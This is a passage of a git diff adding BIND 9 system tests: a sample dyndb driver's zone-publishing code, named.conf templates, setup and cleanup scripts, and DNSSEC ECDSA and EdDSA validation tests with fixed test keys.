should contain the same zone. */ + if (zone_in_view == zone) { + /* Zone is already published in the right view. */ + CLEANUP_WITH(ISC_R_SUCCESS); + } else if (view_in_zone != inst->view) { + /* + * Un-published inactive zone will have + * inst->view in zone but will not be present + * in the view itself. + */ + dns_zone_log(zone, ISC_LOG_ERROR, + "zone->view doesn't " + "match data in the view"); + CLEANUP_WITH(ISC_R_UNEXPECTED); + } + } + + if (zone_in_view != NULL) { + dns_zone_log(zone, ISC_LOG_ERROR, + "cannot publish zone: view already " + "contains another zone with this name"); + CLEANUP_WITH(ISC_R_UNEXPECTED); + } + + run_exclusive_enter(inst, &lock_state); + if (inst->view->frozen) { + freeze = true; + dns_view_thaw(inst->view); + } + + dns_zone_setview(zone, inst->view); + result = dns_view_addzone(inst->view, zone); + if (result != ISC_R_SUCCESS) { + log_write(ISC_LOG_ERROR, + "publish_zone: dns_view_addzone -> %s\n", + isc_result_totext(result)); + goto cleanup; + } + +cleanup: + if (zone_in_view != NULL) { + dns_zone_detach(&zone_in_view); + } + if (freeze) { + dns_view_freeze(inst->view); + } + run_exclusive_exit(inst, lock_state); + + return (result); +} + +/* + * @warning Never call this on raw part of in-line secure zone, call it only + * on the secure zone! + */ +static isc_result_t +load_zone(dns_zone_t *zone) { + isc_result_t result; + bool zone_dynamic; + uint32_t serial; + + result = dns_zone_load(zone, false); + if (result != ISC_R_SUCCESS && result != DNS_R_UPTODATE && + result != DNS_R_DYNAMIC && result != DNS_R_CONTINUE) + { + goto cleanup; + } + zone_dynamic = (result == DNS_R_DYNAMIC); + + result = dns_zone_getserial(zone, &serial); + if (result != ISC_R_SUCCESS) { + log_write(ISC_LOG_ERROR, + "load_zone: dns_zone_getserial -> %s\n", + isc_result_totext(result)); + goto cleanup; + } + dns_zone_log(zone, ISC_LOG_INFO, "loaded serial %u", serial); + + if (zone_dynamic) { + dns_zone_notify(zone); + } + +cleanup: + return (result); +} + +/* + * Add zone to view and call dns_zone_load(). + */ +isc_result_t +activate_zone(sample_instance_t *inst, dns_zone_t *raw) { + isc_result_t result; + + /* + * Zone has to be published *before* zone load + * otherwise it will race with zone->view != NULL check + * in zone_maintenance() in zone.c. + */ + result = publish_zone(inst, raw); + if (result != ISC_R_SUCCESS) { + dns_zone_log(raw, ISC_LOG_ERROR, "cannot add zone to view: %s", + dns_result_totext(result)); + goto cleanup; + } + + result = load_zone(raw); + if (result != ISC_R_SUCCESS) { + log_write(ISC_LOG_ERROR, "activate_zone: load_zone -> %s\n", + isc_result_totext(result)); + goto cleanup; + } + +cleanup: + return (result); +} diff --git a/bin/tests/system/dyndb/driver/zone.h b/bin/tests/system/dyndb/driver/zone.h new file mode 100644 index 0000000..85575a0 --- /dev/null +++ b/bin/tests/system/dyndb/driver/zone.h @@ -0,0 +1,45 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 AND ISC + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * Copyright (C) Red Hat + * + * Permission to use, copy, modify, and distribute this software for any + * purpose with or without fee is hereby granted, provided that the + * above copyright notice and this permission notice appear in all + * copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND STICHTING NLNET + * DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL + * STICHTING NLNET BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR + * CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS + * OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE + * OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE + * USE OR PERFORMANCE OF THIS SOFTWARE. + */ + +#pragma once + +#include <isc/result.h> + +#include <dns/name.h> + +#include "instance.h" + +isc_result_t +create_zone(sample_instance_t *const inst, dns_name_t *const name, + dns_zone_t **const rawp); + +isc_result_t +activate_zone(sample_instance_t *inst, dns_zone_t *raw); diff --git a/bin/tests/system/dyndb/ns1/named.conf.in b/bin/tests/system/dyndb/ns1/named.conf.in new file mode 100644 index 0000000..279d0ed --- /dev/null +++ b/bin/tests/system/dyndb/ns1/named.conf.in @@ -0,0 +1,39 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +controls { }; + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + session-keyfile "session.key"; + listen-on { 10.53.0.1; 127.0.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify yes; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +dyndb sample "../driver/lib/sample.so" { ipv4.example.nil. in-addr.arpa. }; +dyndb sample2 "../driver/lib/sample.so" { ipv6.example.nil. 8.b.d.0.1.0.0.2.ip6.arpa. }; diff --git a/bin/tests/system/dyndb/prereq.sh b/bin/tests/system/dyndb/prereq.sh new file mode 100644 index 0000000..3140d14 --- /dev/null +++ b/bin/tests/system/dyndb/prereq.sh @@ -0,0 +1,27 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +$FEATURETEST --have-dlopen || { + echo_i "dlopen() not supported - skipping dyndb test" + exit 255 +} + +$FEATURETEST --tsan && { + echo_i "TSAN - skipping dyndb test" + exit 255 +} + +exit 0 diff --git a/bin/tests/system/dyndb/setup.sh b/bin/tests/system/dyndb/setup.sh new file mode 100644 index 0000000..e46affa --- /dev/null +++ b/bin/tests/system/dyndb/setup.sh @@ -0,0 +1,17 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +copy_setports ns1/named.conf.in ns1/named.conf diff --git a/bin/tests/system/dyndb/tests.sh b/bin/tests/system/dyndb/tests.sh new file mode 100644 index 0000000..2bc54a7 --- /dev/null +++ b/bin/tests/system/dyndb/tests.sh @@ -0,0 +1,165 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 +n=0 + +DIGOPTS="@10.53.0.1 -p ${PORT}" +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" + +newtest() { + n=`expr $n + 1` + echo_i "${1} (${n})" + ret=0 +} + +test_add() { + host="$1" + type="$2" + ip="$3" + + cat <<EOF > ns1/update.txt +server 10.53.0.1 ${PORT} +ttl 86400 +update add $host $type $ip +send +EOF + + newtest "adding $host $type $ip" + $NSUPDATE ns1/update.txt > /dev/null 2>&1 || { + [ "$should_fail" ] || \ + echo_i "update failed for $host $type $ip" + return 1 + } + + out=`$DIG $DIGOPTS +noall +answer -t $type -q $host` + echo $out > added.a.out.$n + lines=`echo "$out" | grep "$ip" | wc -l` + [ $lines -eq 1 ] || { + [ "$should_fail" ] || \ + echo_i "dig output incorrect for $host $type $cmd: $out" + return 1 + } + + for i in 1 2 3 4 5 6 7 8 9 10 + do + out=`$DIG $DIGOPTS +noall +answer -x $ip` + echo $out > added.ptr.out.$n + lines=`echo "$out" | grep "$host" | wc -l` + [ $lines -eq 1 ] && break; + $PERL -e 'select(undef, undef, undef, 0.1);' + done + [ $lines -eq 1 ] || { + [ "$should_fail" ] || \ + echo_i "dig reverse output incorrect for $host $type $cmd: $out" + return 1 + } + + return 0 +} + +test_del() { + host="$1" + type="$2" + + ip=`$DIG $DIGOPTS +short $host $type` + + cat <<EOF > ns1/update.txt +server 10.53.0.1 ${PORT} +update del $host $type +send +EOF + + newtest "deleting $host $type (was $ip)" + $NSUPDATE ns1/update.txt > /dev/null 2>&1 || { + [ "$should_fail" ] || \ + echo_i "update failed deleting $host $type" + return 1 + } + + out=`$DIG $DIGOPTS +noall +answer -t $type -q $host` + echo $out > deleted.a.out.$n + lines=`echo "$out" | grep "$ip" | wc -l` + [ $lines -eq 0 ] || { + [ "$should_fail" ] || \ + echo_i "dig output incorrect for $host $type $cmd: $out" + return 1 + } + + for i in 1 2 3 4 5 6 7 8 9 10 + do + out=`$DIG $DIGOPTS +noall +answer -x $ip` + echo $out > deleted.ptr.out.$n + lines=`echo "$out" | grep "$host" | wc -l` + [ $lines -eq 0 ] && break + $PERL -e 'select(undef, undef, undef, 0.1);' + done + [ $lines -eq 0 ] || { + [ "$should_fail" ] || \ + echo_i "dig reverse output incorrect for $host $type $cmd: $out" + return 1 + } + + return 0 +} + +test_add test1.ipv4.example.nil. A "10.53.0.10" || ret=1 +status=`expr $status + $ret` + +test_add test2.ipv4.example.nil. A "10.53.0.11" || ret=1 +status=`expr $status + $ret` + +test_add test3.ipv4.example.nil. A "10.53.0.12" || ret=1 +status=`expr $status + $ret` + +test_add test4.ipv6.example.nil. AAAA "2001:db8::1" || ret=1 +status=`expr $status + $ret` + +test_del test1.ipv4.example.nil. A || ret=1 +status=`expr $status + $ret` + +test_del test2.ipv4.example.nil. A || ret=1 +status=`expr $status + $ret` + +test_del test3.ipv4.example.nil. A || ret=1 +status=`expr $status + $ret` + +test_del test4.ipv6.example.nil. AAAA || ret=1 +status=`expr $status + $ret` + +newtest "checking parameter logging" +grep "loading params for dyndb 'sample' from .*named.conf:" ns1/named.run > /dev/null || ret=1 +grep "loading params for dyndb 'sample2' from .*named.conf:" ns1/named.run > /dev/null || ret=1 +[ $ret -eq 1 ] && echo_i "failed" +status=`expr $status + $ret` + +echo_i "checking dyndb still works after reload" +rndc_reload ns1 10.53.0.1 + +test_add test5.ipv4.example.nil. A "10.53.0.10" || ret=1 +status=`expr $status + $ret` + +test_add test6.ipv6.example.nil. AAAA "2001:db8::1" || ret=1 +status=`expr $status + $ret` + +test_del test5.ipv4.example.nil. A || ret=1 +status=`expr $status + $ret` + +test_del test6.ipv6.example.nil. AAAA || ret=1 +status=`expr $status + $ret` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/ecdsa/clean.sh b/bin/tests/system/ecdsa/clean.sh new file mode 100644 index 0000000..a5fa815 --- /dev/null +++ b/bin/tests/system/ecdsa/clean.sh @@ -0,0 +1,24 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f */K* */dsset-* */*.signed +rm -f dig.out* +rm -f ns*/named.run +rm -f ns*/named.memstats +rm -f ns*/named.lock +rm -f ns*/named.conf +rm -f ns*/managed-keys.bind* +rm -f ns*/root.db +rm -f ns*/signer.err +rm -f ns*/trusted.conf +rm -f *-supported.file diff --git a/bin/tests/system/ecdsa/ns1/named.conf.in b/bin/tests/system/ecdsa/ns1/named.conf.in new file mode 100644 index 0000000..da27c58 --- /dev/null +++ b/bin/tests/system/ecdsa/ns1/named.conf.in @@ -0,0 +1,36 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS1 + +controls { /* empty */ }; + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + dnssec-validation yes; +}; + +zone "." { + type primary; + file "root.db.signed"; +}; + +include "trusted.conf"; diff --git a/bin/tests/system/ecdsa/ns1/root.db.in b/bin/tests/system/ecdsa/ns1/root.db.in new file mode 100644 index 0000000..3bff1d1 --- /dev/null +++ b/bin/tests/system/ecdsa/ns1/root.db.in @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. IN SOA fdupont.isc.org. a.root.servers.nil. ( + 2012040600 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 diff --git a/bin/tests/system/ecdsa/ns1/sign.sh b/bin/tests/system/ecdsa/ns1/sign.sh new file mode 100644 index 0000000..8c829bb --- /dev/null +++ b/bin/tests/system/ecdsa/ns1/sign.sh @@ -0,0 +1,56 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +zone=. +infile=root.db.in +zonefile=root.db + +echo_i "ns1/sign.sh" + +cp $infile $zonefile + +if [ -f ../ecdsa256-supported.file ]; then + zsk256=$($KEYGEN -q -a ECDSA256 -n zone "$zone") + ksk256=$($KEYGEN -q -a ECDSA256 -n zone -f KSK "$zone") + cat "$ksk256.key" "$zsk256.key" >> "$zonefile" + $DSFROMKEY -a sha-256 "$ksk256.key" >> dsset-256 +fi + +if [ -f ../ecdsa384-supported.file ]; then + zsk384=$($KEYGEN -q -a ECDSA384 -n zone "$zone") + ksk384=$($KEYGEN -q -a ECDSA384 -n zone -f KSK "$zone") + cat "$ksk384.key" "$zsk384.key" >> "$zonefile" + $DSFROMKEY -a sha-256 "$ksk384.key" >> dsset-256 +fi + +# Configure the resolving server with a static key. +if [ -f ../ecdsa256-supported.file ]; then + keyfile_to_static_ds $ksk256 > trusted.conf + cp trusted.conf ../ns2/trusted.conf +else + keyfile_to_static_ds $ksk384 > trusted.conf + cp trusted.conf ../ns2/trusted.conf +fi + +if [ -f ../ecdsa384-supported.file ]; then + keyfile_to_static_ds $ksk384 > trusted.conf + cp trusted.conf ../ns3/trusted.conf +else + keyfile_to_static_ds $ksk256 > trusted.conf + cp trusted.conf ../ns3/trusted.conf +fi + +$SIGNER -P -g -o "$zone" "$zonefile" > /dev/null 2> signer.err || cat signer.err diff --git a/bin/tests/system/ecdsa/ns2/named.conf.in b/bin/tests/system/ecdsa/ns2/named.conf.in new file mode 100644 index 0000000..fd125d3 --- /dev/null +++ b/bin/tests/system/ecdsa/ns2/named.conf.in @@ -0,0 +1,36 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +controls { /* empty */ }; + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion yes; + notify yes; + dnssec-validation yes; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +include "trusted.conf"; diff --git a/bin/tests/system/ecdsa/ns3/named.conf.in b/bin/tests/system/ecdsa/ns3/named.conf.in new file mode 100644 index 0000000..f1a80b6 --- /dev/null +++ b/bin/tests/system/ecdsa/ns3/named.conf.in @@ -0,0 +1,36 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +controls { /* empty */ }; + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion yes; + notify yes; + dnssec-validation yes; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +include "trusted.conf"; diff --git a/bin/tests/system/ecdsa/setup.sh b/bin/tests/system/ecdsa/setup.sh new file mode 100644 index 0000000..a0eba63 --- /dev/null +++ b/bin/tests/system/ecdsa/setup.sh @@ -0,0 +1,33 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +set -e + +if $SHELL ../testcrypto.sh ecdsap256sha256; then + echo "yes" > ecdsa256-supported.file +fi + +if $SHELL ../testcrypto.sh ecdsap384sha384; then + echo "yes" > ecdsa384-supported.file +fi + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns3/named.conf.in ns3/named.conf +( + cd ns1 + $SHELL sign.sh +) diff --git a/bin/tests/system/ecdsa/tests.sh b/bin/tests/system/ecdsa/tests.sh new file mode 100644 index 0000000..7f3bfcf --- /dev/null +++ b/bin/tests/system/ecdsa/tests.sh @@ -0,0 +1,53 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 +n=0 + +dig_with_opts() { + "$DIG" +tcp +noau +noadd +nosea +nostat +nocmd +dnssec -p "$PORT" "$@" +} + +if [ -f ecdsa256-supported.file ]; then + n=$((n+1)) + echo_i "checking that ECDSA256 positive validation works ($n)" + ret=0 + dig_with_opts . @10.53.0.1 soa > dig.out.ns1.test$n || ret=1 + dig_with_opts . @10.53.0.2 soa > dig.out.ns2.test$n || ret=1 + $PERL ../digcomp.pl dig.out.ns1.test$n dig.out.ns2.test$n || ret=1 + grep "flags:.*ad.*QUERY" dig.out.ns2.test$n > /dev/null || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status+ret)) +else + echo_i "algorithm ECDSA256 not supported, skipping test" +fi + +if [ -f ecdsa384-supported.file ]; then + n=$((n+1)) + echo_i "checking that ECDSA384 positive validation works ($n)" + ret=0 + dig_with_opts . @10.53.0.1 soa > dig.out.ns1.test$n || ret=1 + dig_with_opts . @10.53.0.3 soa > dig.out.ns3.test$n || ret=1 + $PERL ../digcomp.pl dig.out.ns1.test$n dig.out.ns3.test$n || ret=1 + grep "flags:.*ad.*QUERY" dig.out.ns3.test$n > /dev/null || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status+ret)) +else + echo_i "algorithm ECDSA384 not supported, skipping test" +fi + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/eddsa/clean.sh b/bin/tests/system/eddsa/clean.sh new file mode 100644 index 0000000..48c4d81 --- /dev/null +++ b/bin/tests/system/eddsa/clean.sh @@ -0,0 +1,25 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f */K* */dsset-* */*.signed +rm -f dig.out* +rm -f ns*/root.db +rm -f ns*/signer.err +rm -f ns*/named.run +rm -f ns*/named.memstats +rm -f ns*/named.lock +rm -f ns*/managed-keys.bind* +rm -f ns*/trusted.conf +rm -f ns*/example.com.db +rm -f ns*/named.conf +rm -f *-supported.file diff --git a/bin/tests/system/eddsa/ns1/named.conf.in b/bin/tests/system/eddsa/ns1/named.conf.in new file mode 100644 index 0000000..da27c58 --- /dev/null +++ b/bin/tests/system/eddsa/ns1/named.conf.in @@ -0,0 +1,36 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS1 + +controls { /* empty */ }; + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + dnssec-validation yes; +}; + +zone "." { + type primary; + file "root.db.signed"; +}; + +include "trusted.conf"; diff --git a/bin/tests/system/eddsa/ns1/root.db.in b/bin/tests/system/eddsa/ns1/root.db.in new file mode 100644 index 0000000..3bff1d1 --- /dev/null +++ b/bin/tests/system/eddsa/ns1/root.db.in @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. IN SOA fdupont.isc.org. a.root.servers.nil. ( + 2012040600 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 diff --git a/bin/tests/system/eddsa/ns1/sign.sh b/bin/tests/system/eddsa/ns1/sign.sh new file mode 100644 index 0000000..148e475 --- /dev/null +++ b/bin/tests/system/eddsa/ns1/sign.sh @@ -0,0 +1,56 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +zone=. +infile=root.db.in +zonefile=root.db + +echo_i "ns1/sign.sh" + +cp $infile $zonefile + +if [ -f ../ed25519-supported.file ]; then + zsk25519=$($KEYGEN -q -a ED25519 -n zone "$zone") + ksk25519=$($KEYGEN -q -a ED25519 -n zone -f KSK "$zone") + cat "$ksk25519.key" "$zsk25519.key" >> "$zonefile" + $DSFROMKEY -a sha-256 "$ksk25519.key" >> dsset-256 +fi + +if [ -f ../ed448-supported.file ]; then + zsk448=$($KEYGEN -q -a ED448 -n zone "$zone") + ksk448=$($KEYGEN -q -a ED448 -n zone -f KSK "$zone") + cat "$ksk448.key" "$zsk448.key" >> "$zonefile" + $DSFROMKEY -a sha-256 "$ksk448.key" >> dsset-256 +fi + +# Configure the resolving server with a static key. +if [ -f ../ed25519-supported.file ]; then + keyfile_to_static_ds $ksk25519 > trusted.conf + cp trusted.conf ../ns2/trusted.conf +else + keyfile_to_static_ds $ksk448 > trusted.conf + cp trusted.conf ../ns2/trusted.conf +fi + +if [ -f ../ed448-supported.file ]; then + keyfile_to_static_ds $ksk448 > trusted.conf + cp trusted.conf ../ns3/trusted.conf +else + keyfile_to_static_ds $ksk25519 > trusted.conf + cp trusted.conf ../ns3/trusted.conf +fi + +$SIGNER -P -g -o "$zone" "$zonefile" > /dev/null 2> signer.err || cat signer.err diff --git a/bin/tests/system/eddsa/ns2/Xexample.com.+015+03613.key b/bin/tests/system/eddsa/ns2/Xexample.com.+015+03613.key new file mode 100644 index 0000000..ff6d5bf --- /dev/null +++ b/bin/tests/system/eddsa/ns2/Xexample.com.+015+03613.key @@ -0,0 +1 @@ +example.com. IN DNSKEY 257 3 15 l02Woi0iS8Aa25FQkUd9RMzZHJpBoRQwAQEX1SxZJA4= diff --git a/bin/tests/system/eddsa/ns2/Xexample.com.+015+03613.private b/bin/tests/system/eddsa/ns2/Xexample.com.+015+03613.private new file mode 100644 index 0000000..788b2d7 --- /dev/null +++ b/bin/tests/system/eddsa/ns2/Xexample.com.+015+03613.private @@ -0,0 +1,4 @@ +Private-key-format: v1.2 +Algorithm: 15 (ED25519) +PrivateKey: ODIyNjAzODQ2MjgwODAxMjI2NDUxOTAyMDQxNDIyNjI= + diff --git a/bin/tests/system/eddsa/ns2/Xexample.com.+015+35217.key b/bin/tests/system/eddsa/ns2/Xexample.com.+015+35217.key new file mode 100644 index 0000000..71e4620 --- /dev/null +++ b/bin/tests/system/eddsa/ns2/Xexample.com.+015+35217.key @@ -0,0 +1 @@ +example.com. IN DNSKEY 257 3 15 zPnZ/QwEe7S8C5SPz2OfS5RR40ATk2/rYnE9xHIEijs= diff --git a/bin/tests/system/eddsa/ns2/Xexample.com.+015+35217.private b/bin/tests/system/eddsa/ns2/Xexample.com.+015+35217.private new file mode 100644 index 0000000..78ec36d --- /dev/null +++ b/bin/tests/system/eddsa/ns2/Xexample.com.+015+35217.private @@ -0,0 +1,3 @@ +Private-key-format: v1.2 +Algorithm: 15 (ED25519) +PrivateKey: DSSF3o0s0f+ElWzj9E/Osxw8hLpk55chkmx0LYN5WiY= diff --git a/bin/tests/system/eddsa/ns2/example.com.db.in b/bin/tests/system/eddsa/ns2/example.com.db.in new file mode 100644 index 0000000..0ecda67 --- /dev/null +++ b/bin/tests/system/eddsa/ns2/example.com.db.in @@ -0,0 +1,22 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ IN SOA fdupont.isc.org. ns.example.com. ( + 2012040600 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 3600 ; minimum + ) + MX 10 mail.example.com. + NS ns.example.com. +ns.example.com. A 10.53.0.2 diff --git a/bin/tests/system/eddsa/ns2/named.conf.in b/bin/tests/system/eddsa/ns2/named.conf.in new file mode 100644 index 0000000..fd125d3 --- /dev/null +++ b/bin/tests/system/eddsa/ns2/named.conf.in @@ -0,0 +1,36 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +controls { /* empty */ }; + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion yes; + notify yes; + dnssec-validation yes; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +include "trusted.conf"; diff --git 